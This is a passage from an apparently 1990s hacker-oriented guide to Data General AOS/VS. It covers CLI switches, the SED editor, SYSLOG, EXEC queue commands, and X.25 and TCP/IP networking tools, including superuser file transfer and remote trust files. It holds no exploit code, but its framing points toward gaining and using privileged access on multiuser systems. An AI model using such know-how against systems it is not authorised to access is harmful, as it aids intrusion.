  11498. /DACL     Don't pass default ACL to the son process.
  11499.  
  11500. /DATA[=path]
  11501.  
  11502.           Make the son's @DATA file the same as the father's, or [path].
  11503.  
  11504. /DEBUG    Starts the son process in the debugger.
  11505.  
  11506. /DEFAULT  Gives the son process the same privileges as the father's.
  11507.  
  11508. /DIRECTORY=path
  11509.  
  11510.           Make path the initial directory for the son process.
  11511.  
  11512. /DUMP     Appends a dump to the breakfile data.
  11513.  
  11514. /INPUT[=path]
  11515.  
  11516.           Makes the son's @INPUT file the same as the father's, or
  11517.           [path].
  11518.  
  11519. /IOC
  11520.  
  11521.           Makes the son's @INPUT, @OUTPUT AND @CONSOLE the same as does
  11522.           of the father.
  11523.  
  11524. /LIST=[path]
  11525.  
  11526.           Makes the son's @LIST file the same as the father's, or
  11527.           [path].
  11528.  
  11529. /MEMORY=x Sets the son's process maximum memory size in 2kb pages.
  11530.  
  11531. /NAME=name
  11532.  
  11533.           Assign name to the son process.  Now it can accessed both by
  11534.           PID and by name.
  11535.  
  11536. /OUTPUT=path
  11537.  
  11538.           Makes the son's @OUTPUT file to be path.
  11539.  
  11540. /PRIORITY=x
  11541.  
  11542.           Gives the process a priority of 1-511 (highest-lowest).
  11543.  
  11544. /PREEMTIBLE
  11545. /RESIDENT
  11546.  
  11547.           Makes the son process pre-emtible or resident.  The default is
  11548.           swappable.
  11549.  
  11550. /SONS[=x]
  11551.  
  11552.           Allows the son to create one less son process than the father,
  11553.           or x.
  11554.  
  11555. /STRING
  11556.  
  11557.           Stores the termination message in the CLI string.
  11558.  
  11559. /SUPERPROCESS
  11560. /SUPERUSER
  11561.  
  11562.           Allows the son process to enter the appropriate SUPER mode.
  11563.  
  11564. /UNLIMITEDSONS
  11565.  
  11566.           Allows the son process to create unlimited amount of sons.
  11567.  
  11568.  
  11569. SED [path]
  11570. ----------
  11571.  
  11572. SED is a program and not a CLI command and therefore run as XEQ SED ...
  11573. [path] is the file to be edited.  The SED inner prompt is '*'.
  11574.  
  11575. SED is a text editor for creating and modifying files.  SED's help
  11576. facility is accessible by typing HELP from SED:
  11577.  
  11578. ESCAPES   ADD TEXT   CHANGE TEXT   DELETE TEXT   LISTINGS   POSITIONING
  11579. -------   --------   -----------   -----------   --------   -----------
  11580. EXECUTE   APPEND      MODIFY        DELETE        LIST       POSITION
  11581. HELP      INSERT      REPLACE       MOVE          VIEW       FIND
  11582. SAVE      DUPLICATE   SUBSTITUTE    JOIN          PRINT
  11583.           UNDO        SPLIT
  11584.                       CUT
  11585.                       PASTE
  11586.  
  11587. EXITING   MISC            HELP WORDS
  11588. -------   ----            -----------------------
  11589. ABANDON   CLEAR           CURSOR_CONTROL ADDRESS
  11590. BYE       DIRECTORY       RANGE          SOURCE
  11591. CLI       DISPLAY         SEARCH_STRING  DESTINATION
  11592. DO        SET             KEYS           SYNTAX
  11593.           SPELL           SWITCHES
  11594.  
  11595. SED's line editing keys are:
  11596.  
  11597. Ctrl-A    Move to end of line.
  11598. Ctrl-B    Move to end of last word.
  11599. Ctrl-E    Toggle insert mode.
  11600. Ctrl-F    Move to start of next word.
  11601. Ctrl-H    Move to beginning of line.
  11602. Ctrl-I    A tab.
  11603. Ctrl-K    Erase everything right of cursor (like in EMACS).
  11604. Ctrl-X    Move on character to the right.
  11605. Ctrl-Y    Move on character to the left.
  11606. Ctrl-U    Delete entire line.
  11607.  
  11608. The commands are mostly self explanatory, but the format is something
  11609. like this.  Suppose you want to modify line #12, you'd write MODIFY 12,
  11610. which will put you on line 12.  Use the control keys to move about and
  11611. edit the line, then press Return!  If you don't press return but just
  11612. escape back to the SED prompt, your changes will be lost!
  11613.  
  11614. The same goes for most commands, if you need help, just type HELP
  11615. COMMAND from the SED '*' prompt.
  11616.  
  11617.  
  11618. /ED=dir   Finds the SED .ED files in dir.
  11619.  
  11620. /NO_ED    Don't use .ED files.
  11621.  
  11622. /NO_FORM_FEEDS
  11623.  
  11624.           Strip form feeds from the file.
  11625.  
  11626. /NO_RECREATE
  11627.  
  11628.           Don't reset the date of the file after changing it.
  11629.  
  11630. /NO_SCREEN
  11631.  
  11632.           Don't update the console automatically.
  11633.  
  11634. /PROFILE=path
  11635.  
  11636.           path is the SED startup file, that contains legal SED
  11637.           commands.
  11638.  
  11639. /WORK=dir
  11640.  
  11641.           Use this directory for SED temporary files.
  11642.  
  11643.  
  11644. SEND <pid> <message>
  11645. --------------------
  11646.  
  11647. Sends sends <message> to a user, based on the user's PID.  Users' PIDs
  11648. are displayed when typing WHOS.  For example, SEND 2 FU I'M A HACKER.
  11649.  
  11650.  
  11651. STRING [arg]
  11652. ------------
  11653.  
  11654. Without an argument, STRING displays the contents of the CLI's string.
  11655. Displayed strings have commas inserted in them instead of spaces.
  11656. If an argument is present, the string is set to it.
  11657.  
  11658. /K        Set string to null.
  11659.  
  11660. /P        Set string to the the string in the previous environment (each
  11661.           CLI level can have a different string).
  11662.  
  11663.  
  11664. SYSLOG [log file name]
  11665. ----------------------
  11666.  
  11667. SYSLOG handles system logging activity; therefore, SYSLOG can only be
  11668. run with PID 2 (the master console) or with SYSTEMMANAGER privileges
  11669. turned on.  "System logging" logs user information (processor usage, I/O
  11670. usage) in :SYSLOG.  System logging can be ran under several levels of
  11671. detail, so that it may or may not record everything going on (like file
  11672. accesses).  "Superuser logging" are things caused by a superuser who
  11673. will only be logged under the maximum detailed level; therefore, it's
  11674. possible to log them separately, and not record everything else
  11675. everybody else does.  "Error logging", which logs power failures, hard
  11676. errors and such is always on and goes to :ERROR_LOG.  Finally, there's
  11677. "CON0 logging", which logs all activities on the master console, in such
  11678. a way, that if you view the CON0 log from CON0, the log will never
  11679. end...
  11680.  
  11681. /CON0/[START|STOP] [filename]
  11682.  
  11683.           Start or stop CON0 logging.  The older CON0 log will be
  11684.           renamed into [filename], and a new log will be opened.
  11685.           Otherwise, the old log is appended to.
  11686.  
  11687. /DETAIL=[FULL|MINIMAL]
  11688.  
  11689.           Sets (or changes) the level of detail when logging.  The
  11690.           default is MINIMAL; FULL is mostly for security matters.
  11691.  
  11692. /NOSOFTTAPEERRORS
  11693. /SOFTTAPEERRORS
  11694.  
  11695.           Don't (or do) record soft tape errors.
  11696.  
  11697. /RENAMEERROR
  11698.  
  11699.           Rename :ERROR_LOG to something else, and keep on logging to a
  11700.           new file.
  11701.  
  11702. /START [filename]
  11703. /STOP
  11704.           Start (or stop) logging to :SYSLOG.  If [filename] is given,
  11705.           rename :SYSLOG to it and keep on logging to a new file.
  11706.  
  11707. /SUPERUSER/[START|STOP]
  11708.  
  11709.           Start (or stop) Superuser logging.  System logging must
  11710.           already be running.
  11711.  
  11712. /VERBOSE  Give a detailed status.
  11713.  
  11714. Here's a system you wouldn't want to be on:
  11715.  
  11716. SmSu) SYSLOG/START BEFORE_WE_WERE_HACKED
  11717. SmSu) SYSLOG/DETAIL=FULL
  11718. SmSu) SYSLOG/CON0=START
  11719.  
  11720.  
  11721. WHO [hostname:]
  11722. ---------------
  11723.  
  11724. WHO shows information about processes.  Without arguments, it shows
  11725. your processes' information.  If WHOS is issued, information on all the
  11726. processes is displayed.  The output from WHO is similar to this:
  11727.  
  11728. Elapsed 109:21:22, CPU  0:00:35.828, I/O Blocks    0, Page Secs 22186
  11729. PID:     1 PMGR            PMGR            :PMGR.PR
  11730.  
  11731. >From left to right, WHO displayed the process ID; username; console;
  11732. and program pathname.
  11733.  
  11734.  
  11735. WRITE [arg]
  11736. -----------
  11737.  
  11738. Displays [arg], by default to @OUTPUT.  [arg] can also be a pseudo macro
  11739. such as [!USERNAME].
  11740.  
  11741. /FILEID=file
  11742.  
  11743.           Write [arg] to the file specified in file.
  11744.  
  11745. /FORCE
  11746.  
  11747.           Forces the system to write immediately instead of periodically
  11748.           writing the files.
  11749.  
  11750. /NONEWLINE
  11751.  
  11752.           Don't include the newline in the output.
  11753.  
  11754.  
  11755. XEQ <path>
  11756. ----------
  11757.  
  11758. XEQ is identical to EXECUTE; it executes the program in path (how QT).
  11759. The path should be to a file with a PR (PRogram) suffix, although it
  11760. doesn't have to include .PR.
  11761.  
  11762. /I        Takes input from @INPUT, eg from the user.  To end the input,
  11763.           type ')' and Return.
  11764.  
  11765. /M        Takes input from a macro that follow.  The input end the same
  11766.           way as with /I.
  11767.  
  11768. /S        Stores the termination message in a STRING instead of the
  11769.           terminal screen (@OUTPUT).
  11770.  
  11771. THE 'EXEC' PROGRAM
  11772. ~~~~~~~~~~~~~~~~~
  11773.  
  11774. EXEC does more than just log users on.  EXEC is the program that handles
  11775. the AOS/VS multiuser environment.  If handles user logins, but also
  11776. batch, print, and networking queues, printers, and tape mount requests.
  11777.  
  11778. To use any EXEC command, you must either have the username of the EXEC
  11779. user (usually OP) or have SYSTEMMANAGER privileges on.  Alternatively,
  11780. if you have the right ACL (if you're the owner) of the device you're
  11781. executing an EXEC command on, it will also work.
  11782.  
  11783. EXEC commands are issued in this manner: CONTROL @EXEC COMMAND.  EXEC
  11784. has its own help facility, called XHELP, which gives help only on EXEC
  11785. commands.
  11786.  
  11787. These are the EXEC commands (alphabetically, once again):
  11788.  
  11789. ACCESS           CREATE          HOLD           PREMOUNT       STOP
  11790. ALIGN            DEFAULTFORMS    LIMIT          PRIORITY       TERMINATE
  11791. ALLOCATE         DELETE          LOGGING        PROMPTS        TRAILERS
  11792. BATCH_LIST       DISABLE         LPP            PURGE          UNHOLD
  11793. BATCH_OUTPUT     DISMOUNTED      MAPPER         QPRIORITY      UNITSTATUS
  11794. BINARY           ELONGATE        MDUMP          REFUSED        UNLIMIT
  11795. BRIEF            ENABLE          MESSAGE        RELEASE        UNSILENCE
  11796. CANCEL           EVEN            MODIFY         RESTART        VERBOSE
  11797. CLOSE            FLUSH           MOUNTSTATUS    SILENCE
  11798. CONSOLESTATUS    FORMS           OPEN           SPOOLSTATUS
  11799. CONTINUE         HALT            OPERATOR       START
  11800. CPL              HEADERS         PAUSE          STATUS
  11801.  
  11802. ACCESS         Change the ACL of files in the :PER directory.  If some
  11803.                has OWNER access to a device or queue, he can issue an
  11804.                EXEC CONTROL command to it.  If he had READ or WRITE
  11805.                access to a queue, he can display it or add jobs to it,
  11806.                accordingly.  The default ACL is +,RW (READ/WRITE access
  11807.                for all users).  The :PER directory contains devices
  11808.                (such as consoles, printers, etc) and queue jobs.
  11809.  
  11810. ALIGN          Tells the printer handler to stop printing (giving the
  11811.                operator a chance to align the paper).
  11812.  
  11813. ALLOCATE       Restore a tape unit to EXEC's list of mountable tape unit
  11814.                (will show on UNITSTATUS).
  11815.  
  11816. BATCH_LIST     Change the print queue to which a batch's listings go.
  11817.  
  11818. BATCH_OUTPUT   Change the print queue to which a batch's output go.
  11819.  
  11820. BINARY         Tells the printer handler to set or disable BINARY mode.
  11821.                When in binary mode, passes everything sent to the
  11822.                printer as-is.  When binary mode is off, the printing
  11823.                handler catches characters and changes them so they'll
  11824.                have a meaning on the device.  Binary mode is necessary
  11825.                when using a graphics printer, for example.
  11826.  
  11827. BRIEF          Opposite of VERBOSE.
  11828.  
  11829. CANCEL         Cancels a waiting queue entry.
  11830.  
  11831. CLOSE          Prevents a queue from accepting more requests.
  11832.  
  11833. CONSOLESTATUS  Displays the status of an EXEC-handled EXEC.  Displays
  11834.                the console's name, maximum number of login tries
  11835.                allowed, the PID, and which user is logged on (if at
  11836.                all).
  11837.  
  11838. CONTINUE       Continue a device after changes (for example, running
  11839.                START) have been made to it.
  11840.  
  11841. CPL            Changes the number of characters per page for a device.
  11842.  
  11843. CREATE         Create a queue.
  11844.  
  11845. DEFAULTFORMS   Where the default formatting specs are.
  11846.  
  11847. DELETE         Delete a queue.
  11848.  
  11849. DISABLE        The opposite of ENABLE.
  11850.  
  11851. DISMOUNTED     Dismount a tape mounted with CONTROL @EXEC MOUNT.
  11852.  
  11853. ELONGATE       Turns elongated printing on a DASHER LP2 printer on or
  11854.                off.  When printing in elongated printing, the characters
  11855.                are wide.
  11856.  
  11857. ENABLE         For more information, see the section titled "System
  11858.                Security".
  11859.  
  11860. EVEN           Sets the status of pagination on a printer.  When on, all
  11861.                files are printed as if they have an even number of
  11862.                pages, for cosmetic reasons (all header pages come on the
  11863.                same fold of paper [yes, it sounds disgusting]).
  11864.  
  11865. FLUSH          Terminate the currently running job on a device or queue.
  11866.  
  11867. FORMS          Use the formatting specs in a filename for a certain
  11868.                printer.
  11869.  
  11870. HALT           Terminate EXEC.
  11871.  
  11872. HEADERS        Change number of headers printed when printing (default
  11873.                is 1).
  11874.  
  11875. HOLD           Suspends a batch or printer queue until UNHOLD is issued.
  11876.  
  11877. LIMIT          Enforces limits on CPU processor time or number of
  11878.                printed pages on devices or queues.
  11879.  
  11880. LOGGING        Where to send error and status messages instead of CON0,
  11881.                the system console.
  11882.  
  11883. LPP            Sets the number of lines per page when printing.
  11884.  
  11885. MAPPER         Tells the printing handler to use character mapping as
  11886.                defined in a given filename.
  11887.  
  11888. MDUMP          Suspend all other EXEC activities to create a memory dump
  11889.                in the :UTIL directory.
  11890.  
  11891. MESSAGE        Append a message to EXEC's log.
  11892.  
  11893. MODIFY         Modifies the parameters of an inactive queue entry.
  11894.  
  11895. MOUNTSTATUS    Displays the status of all user mount requests.
  11896.  
  11897. OPEN           Opens a queue to receive user requests.
  11898.  
  11899. OPERATOR       Whether or not there's an operator available to help with
  11900.                diskette dumps (remember what the OPERATOR privilege is
  11901.                used for; not everyone has it).
  11902.  
  11903. PAUSE          Suspends processing of a queue or on a device.
  11904.  
  11905. PREMOUNT       Mount a labeled tape volume even before a user request it
  11906.                be mount (and thus the operator doesn't get prompted when
  11907.                users try to mount it; they immediately get access).
  11908.  
  11909. PRIORITY       Changes the priority and/or process type for batches or
  11910.                printing processes.
  11911.  
  11912. PROMPTS        Whether EXEC will display the time after each command.
  11913.  
  11914. PURGE          Delete all inactive entries in a queue.
  11915.  
  11916. QPRIORITY      Limit a batch or device to only job with a certain queue
  11917.                priority (or in a range of priorities).
  11918.  
  11919. REFUSED        Refuse a MOUNT request.
  11920.  
  11921. RELEASE        Remove a tape unit from the list of mountable unit (it
  11922.                won't be displayed with CONTROL @EXEC UNITSTATUS.
  11923.  
  11924. RESTART        Restart a job, and if printer job, can specify from which
  11925.                page until which page to print.
  11926.  
  11927. SILENCE        Suppresses EXEC messages about a device or a batch.
  11928.  
  11929. SPOOLSTATUS    Give device and queue information.  If no devices or
  11930.                queuenames are given, it reports each spooled device and
  11931.                the queue associated with it, CPL, LPP, headers,
  11932.                trailers, binary mode status, form specifications,
  11933.                priority and process type.
  11934.  
  11935. START          Make a connection between a queue and a device.  Jobs for
  11936.                the queue will be run on the device.  This is need for
  11937.                something like printing queues.
  11938.  
  11939. STATUS         Describes the status of devices or batches.  It reports
  11940.                the sequence number, queue priority, user, and PID.  For
  11941.                a printer, it also reports the number of pages left and
  11942.                number of copies left.
  11943.  
  11944. STOP           Dissociate a queue from a device.
  11945.  
  11946. TERMINATE      Terminate the user process on a console (disconnects user).
  11947.  
  11948. TRAILERS       Changed number of trailers printed when printing (default
  11949.                is 0).
  11950.  
  11951. UNHOLD         Release from HOLD.
  11952.  
  11953. UNITSTATUS     Displays mount status of a tape unit or all units if no
  11954.                devicename is specified.
  11955.  
  11956. UNLIMIT        Release from LIMIT.
  11957.  
  11958. UNSILENCE      Release from SILENCE.
  11959.  
  11960. VERBOSE        Give detailed messages.  Brief messages include the
  11961.                queue's name, sequence number and user.  Verbose messages
  11962.                also include the PID and pathname.  Messages are sent
  11963.                when a device or a batch processes a request.
  11964.  
  11965. NETWORKING
  11966. ~~~~~~~~~
  11967.  
  11968. AOS/VS is compatible with several networking protocols.  The most widely
  11969. known and used are X.25 and TCP/IP.  There is also Data General's XODIAC
  11970. network, as well as PCI networks and many others.  In general, network
  11971. services are run as process by the NETOP username (usually "OP"), and
  11972. have programs for the users to execute.  The NETOP process handles
  11973. communications and report generating to the other networking processes.
  11974. It has similar restrictions to that of the EXEC process (one must have
  11975. its username to control it, and so on).
  11976.  
  11977. Before going into specifics, there are some general details about
  11978. networks.  Almost everything having to do with networking -- from hosts,
  11979. to help files and programs, will be found in the :NET directory.
  11980. Programs and macros will be in :NET:UTIL, and so on.  The :PER
  11981. directory, which contains devices, contains devices for the networking
  11982. processes.
  11983.  
  11984. TCP/IP:  The AOS/VS implementation of TCP/IP incorporates the usual
  11985. TCP/IP programs: rlogin, rsh, telnet, ftp, smtp and so on.  Because of
  11986. the way most of these programs were built (with strong relationships to
  11987. Unix), AOS/VS work in a similar way.
  11988.  
  11989. AOS/VS runs RSHD, for remote logging in, and supports individual .RHOST
  11990. files as well as HOSTS.EQUIV files; TELNETD, for telnet sessions; FTPD,
  11991. for ftp sessions; SNMPD, for network management; and SMTP, which is the
  11992. same as activating the AOS/VS SENDMAIL with the become daemon switch,
  11993. for receiving mail.  There are also programs for remote printing and
  11994. dumping of files on tapes, as well as NSLOOKUP and NETSTAT.
  11995.  
  11996. In the :ETC directory, there will be some general TCP/IP files, and in
  11997. :USR:LIB there will be spool directories for mail and printing services.
  11998. The files normally found in :ETC will usually match the format and
  11999. function of their counterparts on Unix (for example, :ETC:HOSTS =
  12000. /etc/hosts, and so on).  However, some explaining is necessary.
  12001.  
  12002. The file :ETC:PASSWD does not contain any passwords.  It exists for the
  12003. use of the SENDMAIL program, for looking up local users on the machine.
  12004. Thus if someone sends mail to a local user, mail will be sent only if
  12005. that user has an entry in :ETC:PASSWD.  An example file would be,
  12006.  
  12007. op::0:::/udd/op:
  12008. mail::8:::/usr/spool/mqueue:
  12009.  
  12010. :ETC:SNMPD.TRAP_COMMUNITIES contains a list of hosts, ports, and
  12011. communities that the SNMPD process will send traps to (a SNMP trap is a
  12012. message sent indicating a change of state).
  12013.  
  12014. :USR:LIB contains mail programs, such as SENDMAIL's aliases file, the
  12015. SENDMAIL program itself, the SENDMAIL.CF (configuration file) and so on.
  12016.  
  12017. :USR:SPOOL contains spool directory, for printing (like LPD) and mail
  12018. (MQUEUE).
  12019.  
  12020. The format for sending mail on AOS/VS using SMTP is just like on Unix,
  12021. only the program name is SENDMAIL.
  12022.  
  12023. The AOS/VS TCP/IP installation usually comes with TCP libraries, such as
  12024. SOCKIT.LB, which provides ordinary Unix socket functions, from bind(),
  12025. connect(), and listen(), to gethostbyaddr(), getservbyport(), etc;
  12026. making it possible to program and compile network applications using
  12027. TCP/IP routines and the AOS C compiler.
  12028.  
  12029. For more information about these services, and network programming, read
  12030. a file about TCP/IP and/or Unix.
  12031.  
  12032. AOS/VS NETWORK PROCESSES:  Each network process usually comprises two
  12033. other processes, one for local users, and one for remote users on the
  12034. local host.  RMA provides URMA and SRMA; FTA provides UFTA and SFTA, and
  12035. so on.  What does it mean?  Simply, the S+ programs are "daemons" for
  12036. the network actions, and the U+ programs are user executable programs.
  12037. All the S+ programs are controlled through the NETOP process, while the
  12038. user programs are executed as programs by individual users.
  12039.  
  12040. I will take some time to explain these programs and how they work.  RMA
  12041. stands for Resource Management Agent.  FTA stands for File Transfer Agent,
  12042. and VTA stands for Virtual Terminal Agent.  The 'U' in the programs stands
  12043. for "Using" and the 'S' for "Serving."
  12044.  
  12045. VTA: the SVTA process provides virtual terminals for remote UVTA users,
  12046. as well as PAD support through PDNs; it controls the system's link to
  12047. any PDN.  Connections can be made from public PADs (like Telenet), and
  12048. through UVTA or any other PAD interface.  SVTA logs command responses
  12049. and errors by reporting them to the NETOP process, or a facility set by
  12050. CONTROL @SVTA SET/OUTPUT= and /LOG=.  If an error occurs during this
  12051. logging, OUTPUT is reset to the NETOP process (if something is faulty
  12052. with the NETOP process, the message is lost).
  12053.  
  12054. SVTA is controlled through the NETOP process, so SVTA commands are the
  12055. format of "CONTROL @SVTA <command name>".  SVTA commands:
  12056.  
  12057. SET            Sets miscellaneous SVTA parameters, such as whether to
  12058.                include the current time or date at SVTA prompts
  12059.                (/TIME or /NOTIME, /DATE or /NODATE); where and if to send
  12060.                the SVTA process' output (/OUTPUT=[pid #] or [@console] or
  12061.                [process name], or /NOOUTPUT); and where to write SVTA logs
  12062.                (/LOG=file).  Logs files are of format
  12063.                SVTA_month_day_year.LOG and is stored in :NET:LOGFILES
  12064.                (unless changed).
  12065.  
  12066. OWNER          Assigns a process name to the SVTA process.  If no name
  12067.                is given, SVTA returns its current process name.
  12068.  
  12069. REVERSE        ON or OFF.  Tells SVTA whether or not to accept reverse
  12070.                charged (collect) calls over the PDN.
  12071.  
  12072. STATUS         If no argument is given, SVTA issues a global status
  12073.                report.  If an argument is given, it can either be
  12074.                @VCONnn -- an SVTA controlled virtual console, or a PID (a
  12075.                report will be generated for all VCONs owned by that PID).
  12076.  
  12077. The user side, UVTA, is loaded by XEQ UVTA.  The user is faced with a
  12078. prompt, from which he can start connections and issue other UVTA
  12079. commands.  UVTA commands:
  12080.  
  12081. CALL <host>    First and formost, call a remote host.  A remote host is
  12082.                a host that has its name in the :NET directory (file type
  12083.                HST).  If UVTA can't locate the host in the :NET
  12084.                directory, it reports that the file does not exist.  CALL
  12085.                accepts two arguments, the remote host and the remote
  12086.                process.  Remote process in in the format of [user]:process.
  12087.                [user] defaults to OP; when this parameter is given, UVTA
  12088.                attempts to connect to a VCON controlled by that
  12089.                process/user combination.  The remote process defaults to EXEC
  12090.                (OP:EXEC), which means the user connects to a console controlled
  12091.                by the EXEC program (and faces the usual login procedure).
  12092.                CALL can be replaced by loading UVTA with CALL's
  12093.                parameters.
  12094.  
  12095.                Trying to use UVTA as a sort of RLOGIN by connecting to
  12096.                CLIs will probably not work, since unless the remote CLI
  12097.                has opened a VCON, you will get flooded with "Remote user
  12098.                refused connection" error messages, until you abort UVTA
  12099.                or that CLI does open a console -- all of this, of
  12100.                course, assuming that user is there in the first place
  12101.                and you won't get a "Process unknown" error message.
  12102.  
  12103.                Once connected, ^C^V will abort the call and the UVTA
  12104.                process.  ^C^T will break from remote mode to the local
  12105.                UVTA prompt.
  12106.  
  12107. RCONTROL       The control character (not including Ctrl-C) to break
  12108.                from remote mode to the local prompt.  'A', 'B', 'E', 'Q',
  12109.                'S' and 'V' are taken by the system and cannot be used.
  12110.  
  12111. EXECUTE <prog> Execute the parameter issued as a son process of your
  12112.                UVTA (this will fail if you don't have the privilege to
  12113.                create son processes without blocking the father).
  12114.  
  12115. The File Transfer Agent, FTA, is something like the FTP port to X.25.
  12116. A user using UFTA can connect to a host running SFTA, supply a valid
  12117. username/password pair, and transfer files from or to the remote host.
  12118.  
  12119. A short summary of UFTA commands, in the order they are usually executed:
  12120.  
  12121. CALL <host>    Connect to the remote host, given as an argument.
  12122.                Once connected, a ^C^A sequence will abort a transfer in
  12123.                the middle.
  12124.  
  12125. USER <account> Supply a username to the remote host, or if no argument
  12126.                is given, assume the local username to be identical to
  12127.                the remote one.  In any case, a password must be
  12128.                supplied.
  12129.  
  12130. SUPERUSER      If the user given through USER has Superuser privileges,
  12131.                will turn them for the file transfers (you can now take
  12132.                or put files that you couldn't before, because of the
  12133.                ACLs).
  12134.  
  12135. FILES <path>   FILES takes one argument, being the directory which
  12136.                contents will be listed.  FILES takes most arguments the
  12137.                CLI FILES takes (/ASSORTMENT, /TYPE, etc).
  12138.  
  12139. TYPE <file>    Display a remote file.
  12140.  
  12141. STORE <l> <r>  Transfers the local file, 'l', to the remote destination
  12142.                file, 'r'.  STORE will fail if the user is not privileged
  12143.                for the action, or if he is trying to transfer an
  12144.                irregular file, such as a network host file.
  12145.                Switches are: /APPEND, to append the file to the
  12146.                destination; /COMPRESS, to compress data for the
  12147.                transfer, and /DELETE, to delete the destination file if
  12148.                it already exists.
  12149.                File transfer modes are controlled through the /BLOCK and
  12150.                /RECORD switches.  /BLOCK, the defaults, means
  12151.                block-by-block transfers, and /RECORD means to transfer
  12152.                each record in the file at a time.
  12153.  
  12154. RETRIEVE <l> <r>  Transfers a remote file, 'r', to the local destination,
  12155.                   'l'.  The same restrictions and switches for STORE apply
  12156.                   here.
  12157.  
  12158. RECOVER <id>   RECOVER is the command used for recovering aborted
  12159.                transfers.  Both STORE and RETRIEVE have another
  12160.                switch called /RECOVER.  When used in conjunction with
  12161.                that switch, the transfer request's working set is kept.
  12162.                Thus, if a transfer was stopped by ^C^A, it can be
  12163.                resumed by RECOVER.  Without the "id" argument, RECOVER
  12164.                lists all the transfer IDs (which are actually interrupted
  12165.                transfers) it can recover.
  12166.  
  12167. SEND <msg>     Will send "msg" to the operator on the remote host.
  12168.                The message is sent to the SFTA on the remote host, and
  12169.                forwarded to the operator from there.
  12170.  
  12171. The X25 process controls X.25 connection over the AOS/VS network.  It
  12172. controls accounting, virtual connection handling, links, and so on.  X25
  12173. commands, operated through the NETOP process (CONTROL @X25):
  12174.  
  12175. ACCOUNT        Enable or disabling the accounting function of X25.
  12176. NOACCOUNT
  12177.  
  12178. STATUS <vc#>   Displays the status of a virtual connection.  It displays
  12179.                the remote address, number of packets passed, connection
  12180.                state and the user of the connection.
  12181.  
  12182.                Note that virtual connection numbers are reported by X25
  12183.                as octal numbers and are therefore read as such.
  12184.  
  12185. CLEAR <vc#>    Clears a virtual connection, after informing its local
  12186.                owner of the clear.
  12187.  
  12188. CUSTOMERS      Displays a list of X25 customers, meaning processes which
  12189.                have connected to and have not yet disconnected from X25,
  12190.                and are therefore known by it.
  12191.  
  12192. LSTATUS        Displays a status report about a logical link (host).
  12193.                The report gives details about the device status and
  12194.                number of bytes tranfered.
  12195.  
  12196. TRACE <file>   Starts a trace of an X.25 connection to the file
  12197. NOTRACE        specified as the argument.  X25 defaults to trace
  12198.                everything -- anything coming out of or going into the
  12199.                system, however this can be overridden by using /LINK=link
  12200.                to trace connections to a specific link, /VC=oct# to
  12201.                trace a specific virtual connection, or PID=pid# to trace
  12202.                virtual connections owned by the process given.
  12203.  
  12204.                NOTRACE stops the trace.
  12205.  
  12206.                X25 trace files must be displayed through another network
  12207.                utility (not an X25 subcommand), called NTRACE.
  12208.                NTRACE takes as an argument the file in which X25 stores
  12209.                trace info, and displays it in human readable format
  12210.                according to its switches, which are: /DIRECTION=[BOTH|INCOMING
  12211.                |OUTGOING], for packet directions (defaults to BOTH);
  12212.                /LIST=file, for the file to which output goes (defaults
  12213.                to the terminal); RLENGTH=[ALL|#], for the number of
  12214.                bytes from the packets to be displayed (defaults to ALL).
  12215.                The last switch is the packet types to be displayed
  12216.                (default to every packet), and is:
  12217.  
  12218. Type                 Incoming calls                  Outgoing calls
  12219. -------------+--------------------------------+--------------------------
  12220. /CALL                Incoming call                  Call request
  12221. /CONNECT             Call connected                 Call connected
  12222. /CI                  Clear Indication               Clear request
  12223. /CCFM                Clear ConFirMation             Clear confirmation
  12224. /DATA                Data                           Data
  12225. /INTERRUPT           Interrupt                      Interrupt
  12226. /INTCFM              Interrupt confirmation         Interrupt confirmation
  12227. /RCVR                RR - receive ready             RR
  12228. /RNR                 RNR - receive not read         RNR
  12229. /REJ                          --                    REJ - reject
  12230. /RSTIND              Reset INDication               Reset request
  12231. /RSTCFM              Reset confirmation             Reset confirmation
  12232. /RRTIND              Restart indication             Restart request
  12233. /RRTCFM              Restart confirmation           Restart confirmation
  12234.  
  12235.                The 2nd and 3rd columns in the chart specify what the
  12236.                packet means if the local host is being connected to
  12237.                (incoming call) or is trying to reach another host
  12238.                (outgoing).
  12239.  
  12240. RESOURCES <pid> Displays any connections owned by <pid>.  <pid> can be a
  12241.                process ID, or of the format username:processname.
  12242.  
  12243. One of the more interesting programs in XODIAC networking is NETGEN.
  12244. NETGEN (in :NET:NETGEN) is a program used to configure the network: host
  12245. addresses, routes, services, and so on.  When NETGEN is loaded, it
  12246. enters interactive mode and enables the user to configure and change
  12247. network settings from menus.  Later, it can be called using its one and
  12248. only switch, /RECREATE=<path>, to re-create the network files in :NET
  12249. according to the specification file given in <path>.
  12250.  
  12251. NETGEN's main menu, gives three options (other than terminating).
  12252. Creating or modifying a specification file, and creating configuration
  12253. files.  The specification file contains in it,
  12254.  
  12255.      o details pertaining to the local host's configuration on the
  12256.        network: the host ID, host name, domain, etc;
  12257.  
  12258.      o hardware device configuration: device name, type, code, and
  12259.        miscellaneous details varying from device type to another;
  12260.  
  12261.      o link configuration: link name, device name/type it uses, and
  12262.        (changing on the type of device), network type, line number,
  12263.        protocols, X.25 packet configuration (size/window size/retries),
  12264.        duplex, and more;
  12265.  
  12266.      o general network attributes: extended addressing, diagnostics,
  12267.        calling DTE in outgoing calls, etc;
  12268.  
  12269.      o X.25 configuration: packet/window size negotiation, reverse
  12270.        charging, NUIs, etc;
  12271.  
  12272.      o virtual calls configuration: permanent virtual calls, VC
  12273.        numbering, etc;
  12274.  
  12275.      o remote host configuration: X.25 parameters, link to be used,
  12276.        address (decimal/hex), name, host file name, etc;
  12277.  
  12278.      o network processes configuration: name, ACL, and other details
  12279.        (varies).
  12280.  
  12281. Upon loading NETGEN, there are about three menus branching off from
  12282. every option, so I cannot really mention everything.  However, since
  12283. it's mostly self explanatory, I am putting in here the output from
  12284. NETGEN's Print Specifications entry, edited to show X.25 links through
  12285. Telenet and the local configuration, plus TELNETD.  By looking at it,
  12286. one might learn how NETGEN looks/operates, and what details are
  12287. available.
  12288.  
  12289. This file was created using (from the main menu): 2. Access/Update Spec
  12290. File => 7. Print Configurations => file (instead of @LPT).
  12291.  
  12292. -----------------------------------------------------------------------------
  12293.  
  12294.                        ((Actual details changed.))
  12295.  
  12296.                     NETWORK SPECIFICATION PRINT FILE
  12297.  
  12298.  
  12299.     Specfile: :NET:NETGEN:SPEXBAKZ
  12300.  
  12301.     Date: 32-Nov-93
  12302.  
  12303.     Time:  4:66:22 PM
  12304.  
  12305.  
  12306.                           LOCAL HOST CONFIGURATION
  12307.  
  12308.  
  12309. Local Host Name : PATBBS
  12310.  
  12311. ACL : + ORAEW
  12312.  
